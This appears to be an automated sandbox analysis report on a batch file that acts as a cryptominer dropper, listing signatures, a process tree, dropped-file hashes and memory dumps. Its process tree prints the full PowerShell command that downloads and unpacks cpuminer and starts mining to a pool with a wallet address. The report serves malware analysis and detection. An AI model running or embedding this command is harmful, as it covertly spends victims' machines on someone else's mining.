b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1792s
max time network
1798s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
03/02/2024, 14:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2968	powershell.exe
10	2968	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1604	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1604	cpuminer-sse2.exe
1604	cpuminer-sse2.exe
1604	cpuminer-sse2.exe
1604	cpuminer-sse2.exe
1604	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2968	powershell.exe
2968	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2968	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3196 wrote to memory of 2968	3196	cmd.exe	86
PID 3196 wrote to memory of 2968	3196	cmd.exe	86
PID 2968 wrote to memory of 1744	2968	powershell.exe	97
PID 2968 wrote to memory of 1744	2968	powershell.exe	97
PID 1744 wrote to memory of 1604	1744	cmd.exe	98
PID 1744 wrote to memory of 1604	1744	cmd.exe	98

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3196
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2968
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1744
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1604

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2a5wfvre.bxw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
81KB

MD5
7cf46780c44a4bd4845b18664de56e77

SHA1
a5d4686a27b4f37064a3e35da18479a6c361c1d7

SHA256
0cbe6b6bc8ed0fe12fdf054dffe748410209f04a61fe783061c883a81444ceb4

SHA512
91cfbc22ab1c23f98db2b6afab6d9493b4273ffe141f532536724f2795f467c14ed59e7bd23569094ee39ab9c13369118a1ccfac10180ec9413f169115c894a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
68KB

MD5
fe00a54d7c7a94e213ea6543f8f1f70b

SHA1
9d9bf66a461f70a283a42a47b35afcd238f69bae

SHA256
f1660128f27bc1a832c9dd27d9cc2ea8fdeb4f22067c7795c7211823fc193f03

SHA512
68c66a8932cfff755a7f0c740b48061150c13ed050f1c9ef10a4f116e8295a8070d10eb6326ff55d42b7fd2190830e237700feb58a5dca350230eec51b2a2bd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
18KB

MD5
15f30c30cf653c6973384549897fd181

SHA1
9170699bc39361bd37af06adcda8093cfafb938e

SHA256
fc372c2913d9a2503a5c92de6457bf97066f19c321d1ecedaa7cf1b524b3a40d

SHA512
e601037c6fcb65c1cff8a517249b77a117712296962c5400b8c66d938b3bda0edbf511a08c00dca56b84a59b4c28f28f3f246f3af599bece488506cf69f40f37

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
89KB

MD5
f60e64e4aace207226c6cd44c5ce1417

SHA1
b1cc97ad1f28e1c615e18f0b9924c4f7e54d9773

SHA256
a30d7c40aace0460ce9ac4051c2a97fa02252b017bcbfc1ea3fd14e6528edffb

SHA512
ce3e34d5cecd92065de2cee5950e48fd8df111a4b7fff2ed5c31fe0d2acb6c48fe6ca4e46401307ca305fa406990218830875c5785c9bafe730d7c34c52e2f16

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
99KB

MD5
8d336eb2ad180e337d4cb9d34ca522a3

SHA1
6d4a021f72bf025e7c4525e11e166c5c2656c03f

SHA256
f28e6de60a43aaed3818f21ff9e5fb7df544dbdfd490d9b2474e06856d0afa75

SHA512
3287b7b6c1e120959b15dd6c0a39472a30d221c34d24a035abac4c43c412c3094ab901981ab2cbadc62ed18b2e7981db2883f5633bd9bdcf78537eabda5bc5ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
88KB

MD5
fe793d79f22fd7b241eb1dde08e74699

SHA1
e21abc5ff58ec4c1db76dc7d58a94f9de441f71c

SHA256
30af16b3c9427c7f269d70b68b8c1b85b5bfaa51fd3cd12ea3a5d743bb6518fa

SHA512
77679cd6aeb525fcc7702b1a40baeed581549bdcd542a993f8a49a8b722fc6d2ebde4444e1446de72af86a39d0f27a348bcaa5cfc69d2f595e1452a2ce2af3f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
70KB

MD5
8f911114ce1e1138adf4d6fe776901ab

SHA1
f6f3678f82e5144c4f1f9b2c71929d9bf4d1112f

SHA256
bcdd314abd05592cc6d92997fd2152a8d943f6248427bf1f68d0700c86ce557d

SHA512
c3cda08cc032507159b8a2739aecd6b3072613b262cf2370bc45e5e66297167a301a39f4c2b0c24fed9a6532c475c4b701dc975d975f4db15f893c27390edc7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
762KB

MD5
4f0147dc558c92e0b057e73d4f3673b6

SHA1
362c004d47bf93a3031e6edea4fb113d09caa273

SHA256
138413907104d2750a35473e7553c16c325f0bedda91761d842d6b7172d0b511

SHA512
cb4d28b19ddfd7a356940d4a5ba5cc75c90651acb0c07fd2ff28c35e7e62adac84a078c1f98835b596baf08fc96c84a6bec7d67dc96555a749a09db0dad88fe3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
624KB

MD5
d8d26e9be4ab9e639f37df57a8c3df43

SHA1
383f992bb72b7ac99360ac7d75ff272eb38fc4a9

SHA256
0823f2a27dfee2374d705f8bd344456c4cc49da128262863b733b062bd9d4501

SHA512
103d2bdea7e0d06d490a0706b41e0b37a94b42c528129f9c82fef916541f089d47fcd3a999dc4c984df5f5db35f8232d691c5045fa9a78fc0e50c6703f181512

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
17KB

MD5
5bc8d1d3fcb2cf65e6506e5cb8ee3616

SHA1
7d06ec2a7478f52f0a3e583162f0ab9e9fc9f37b

SHA256
0a88602bbcd6ef81a69c5018fadbd011bdca99ffd588281cbe788865092c3c37

SHA512
02997155f2e868b5b7eca732ddee911248aee4a78b1acc11e157cf728cbee9ee561435c9647e98d71002766bf7aae11862f9fb68eaec2f94d003efcefa798128

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
57KB

MD5
07b59122b40ce7a866b54f68cf5b7ceb

SHA1
f95371c9234b6145bbc6ef086213c86dade22921

SHA256
c97fcebe672fa8f7703e7b627d248b9b87a51d8ffeb6ac1dab72cec31106ca7d

SHA512
9796f33345c001a51b49fce5319c0a0bfb144b37f26ba7d9c1e26a619c9e151667e2d67171be1afcdaf56b05d537a4999315d523fc98739c7f4766fb90acb0de

Download Submit
memory/1604-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1604-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1604-131-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1604-126-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1604-121-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1604-111-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1604-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1604-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1604-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1604-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1604-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1604-75-0x0000000000E20000-0x00000000026D5000-memory.dmp

Filesize
24.7MB

Download
memory/1604-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1604-74-0x0000000063360000-0x00000000633F8000-memory.dmp

Filesize
608KB

Download
memory/1604-73-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1604-72-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2968-58-0x00007FFFAD430000-0x00007FFFADEF1000-memory.dmp

Filesize
10.8MB

Download
memory/2968-1-0x000001FA51C50000-0x000001FA51C60000-memory.dmp

Filesize
64KB

Download
memory/2968-0-0x00007FFFAD430000-0x00007FFFADEF1000-memory.dmp

Filesize
10.8MB

Download
memory/2968-19-0x000001FA6C6A0000-0x000001FA6C6B2000-memory.dmp

Filesize
72KB

Download
memory/2968-2-0x000001FA6C470000-0x000001FA6C502000-memory.dmp

Filesize
584KB

Download
memory/2968-8-0x000001FA6C400000-0x000001FA6C422000-memory.dmp

Filesize
136KB

Download
memory/2968-13-0x000001FA6C3D0000-0x000001FA6C3E0000-memory.dmp

Filesize
64KB

Download
memory/2968-14-0x000001FA6C720000-0x000001FA6C82E000-memory.dmp

Filesize
1.1MB

Download
memory/2968-15-0x000001FA6C430000-0x000001FA6C446000-memory.dmp

Filesize
88KB

Download
memory/2968-16-0x00007FFFAD430000-0x00007FFFADEF1000-memory.dmp

Filesize
10.8MB

Download
memory/2968-18-0x000001FA51C50000-0x000001FA51C60000-memory.dmp

Filesize
64KB

Download
memory/2968-20-0x000001FA6C450000-0x000001FA6C45A000-memory.dmp

Filesize
40KB

Download